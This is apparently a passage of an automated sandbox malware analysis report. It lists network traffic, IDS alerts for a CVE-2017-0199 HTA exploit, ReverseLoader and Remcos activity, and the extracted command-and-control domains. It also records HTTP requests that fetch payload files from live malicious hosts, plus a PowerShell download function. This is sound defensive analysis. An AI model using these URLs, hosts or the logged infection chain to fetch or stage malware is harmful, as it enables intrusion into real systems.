                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.93.65.161:80

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.22:49169 -> 142.93.65.161:80
                  Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: Network trafficSuricata IDS: 2858796 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M1 : 192.168.2.22:49177 -> 142.93.65.161:80
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49179 -> 31.13.224.72:4044
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49178 -> 31.13.224.72:4044
                  Source: Network trafficSuricata IDS: 2858796 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M1 : 192.168.2.22:49181 -> 142.93.65.161:80
                  Source: Network trafficSuricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 142.93.65.161:80 -> 192.168.2.22:49177
                  Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 142.93.65.161:80 -> 192.168.2.22:49177
                  Source: Network trafficSuricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 142.93.65.161:80 -> 192.168.2.22:49181
                  Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 142.93.65.161:80 -> 192.168.2.22:49181
                  Source: Network trafficSuricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 142.93.65.161:80 -> 192.168.2.22:49177
                  Source: Network trafficSuricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 142.93.65.161:80 -> 192.168.2.22:49177
                  Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 151.101.65.137:443 -> 192.168.2.22:49176
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: lonan.duckdns.org
                  Uses dynamic DNS services
                  Source: unknownDNS query: name: apamanollonan.duckdns.org
                  Source: global trafficTCP traffic: 192.168.2.22:49178 -> 31.13.224.72:4044
                  Source: global trafficHTTP traffic detected: GET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1Host: res.cloudinary.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /680/SRVRER.txt HTTP/1.1Host: 142.93.65.161Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /680/SRVRER.txt HTTP/1.1Host: 142.93.65.161Connection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                  Source: Joe Sandbox ViewIP Address: 151.101.65.137 151.101.65.137
                  Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
                  Source: Joe Sandbox ViewASN Name: SARNICA-ASBG SARNICA-ASBG
                  Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                  Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                  Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49175 -> 142.93.65.161:80
                  Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.22:49180 -> 178.237.33.50:80
                  Source: global trafficHTTP traffic detected: GET /MJoi1u?&hosiery=imminent&basketball=innate&greece=brash&board=wee&pacemaker HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: short.ruksk.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /MJoi1u?&hosiery=imminent&basketball=innate&greece=brash&board=wee&pacemaker HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: short.ruksk.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /MJoi1u?&hosiery=imminent&basketball=innate&greece=brash&board=wee&pacemaker HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: short.ruksk.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /MJoi1u?&hosiery=imminent&basketball=innate&greece=brash&board=wee&pacemaker HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: short.ruksk.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 142.93.65.161Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 142.93.65.161If-Range: "26ff2-6285702adf515"
                  Source: global trafficHTTP traffic detected: GET /680/weneedkissingwellongirlfriendshebeautifulgirl.tIF HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 142.93.65.161Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Tue, 03 Dec 2024 05:33:52 GMTConnection: Keep-AliveHost: 142.93.65.161If-None-Match: "26ff2-6285702adf515"
                  Source: unknownHTTPS traffic detected: 151.101.65.137:443 -> 192.168.2.22:49176 version: TLS 1.0
                  Source: unknownTCP traffic detected without corresponding DNS query: 142.93.65.161
                  Source: unknownTCP traffic detected without corresponding DNS query: 142.93.65.161
                  Source: unknownTCP traffic detected without corresponding DNS query: 142.93.65.161
                  Source: unknownTCP traffic detected without corresponding DNS query: 142.93.65.161
                  Source: unknownTCP traffic detected without corresponding DNS query: 142.93.65.161
                  Source: unknownTCP traffic detected without corresponding DNS query: 142.93.65.161
                  Source: unknownTCP traffic detected without corresponding DNS query: 142.93.65.161
                  Source: unknownTCP traffic detected without corresponding DNS query: 142.93.65.161
                  Source: unknownTCP traffic detected without corresponding DNS query: 142.93.65.161
                  Source: unknownTCP traffic detected without corresponding DNS query: 142.93.65.161
                  Source: unknownTCP traffic detected without corresponding DNS query: 142.93.65.161
                  Source: unknownTCP traffic detected without corresponding DNS query: 142.93.65.161
                  Source: unknownTCP traffic detected without corresponding DNS query: 142.93.65.161
                  Source: unknownTCP traffic detected without corresponding DNS query: 142.93.65.161
                  Source: unknownTCP traffic detected without corresponding DNS query: 142.93.65.161
                  Source: unknownTCP traffic detected without corresponding DNS query: 142.93.65.161
                  Source: unknownTCP traffic detected without corresponding DNS query: 142.93.65.161
                  Source: unknownTCP traffic detected without corresponding DNS query: 142.93.65.161
                  Source: unknownTCP traffic detected without corresponding DNS query: 142.93.65.161
                  Source: unknownTCP traffic detected without corresponding DNS query: 142.93.65.161
                  Source: unknownTCP traffic detected without corresponding DNS query: 142.93.65.161
                  Source: unknownTCP traffic detected without corresponding DNS query: 142.93.65.161
                  Source: unknownTCP traffic detected without corresponding DNS query: 142.93.65.161
                  Source: unknownTCP traffic detected without corresponding DNS query: 142.93.65.161
                  Source: unknownTCP traffic detected without corresponding DNS query: 142.93.65.161
                  Source: unknownTCP traffic detected without corresponding DNS query: 142.93.65.161
                  Source: unknownTCP traffic detected without corresponding DNS query: 142.93.65.161
                  Source: unknownTCP traffic detected without corresponding DNS query: 142.93.65.161
                  Source: unknownTCP traffic detected without corresponding DNS query: 142.93.65.161
                  Source: unknownTCP traffic detected without corresponding DNS query: 142.93.65.161
                  Source: unknownTCP traffic detected without corresponding DNS query: 142.93.65.161
                  Source: unknownTCP traffic detected without corresponding DNS query: 142.93.65.161
                  Source: unknownTCP traffic detected without corresponding DNS query: 142.93.65.161
                  Source: unknownTCP traffic detected without corresponding DNS query: 142.93.65.161
                  Source: unknownTCP traffic detected without corresponding DNS query: 142.93.65.161
                  Source: unknownTCP traffic detected without corresponding DNS query: 142.93.65.161
                  Source: unknownTCP traffic detected without corresponding DNS query: 142.93.65.161
                  Source: unknownTCP traffic detected without corresponding DNS query: 142.93.65.161
                  Source: unknownTCP traffic detected without corresponding DNS query: 142.93.65.161
                  Source: unknownTCP traffic detected without corresponding DNS query: 142.93.65.161
                  Source: unknownTCP traffic detected without corresponding DNS query: 142.93.65.161
                  Source: unknownTCP traffic detected without corresponding DNS query: 142.93.65.161
                  Source: unknownTCP traffic detected without corresponding DNS query: 142.93.65.161
                  Source: unknownTCP traffic detected without corresponding DNS query: 142.93.65.161
                  Source: unknownTCP traffic detected without corresponding DNS query: 142.93.65.161
                  Source: unknownTCP traffic detected without corresponding DNS query: 142.93.65.161
                  Source: unknownTCP traffic detected without corresponding DNS query: 142.93.65.161
                  Source: unknownTCP traffic detected without corresponding DNS query: 142.93.65.161
                  Source: unknownTCP traffic detected without corresponding DNS query: 142.93.65.161
                  Source: unknownTCP traffic detected without corresponding DNS query: 142.93.65.161
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE899C7018 URLDownloadToFileW,7_2_000007FE899C7018
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D8531221.emfJump to behavior
                  Source: global trafficHTTP traffic detected: GET /MJoi1u?&hosiery=imminent&basketball=innate&greece=brash&board=wee&pacemaker HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: short.ruksk.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /MJoi1u?&hosiery=imminent&basketball=innate&greece=brash&board=wee&pacemaker HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: short.ruksk.comConnection: Keep-Alive
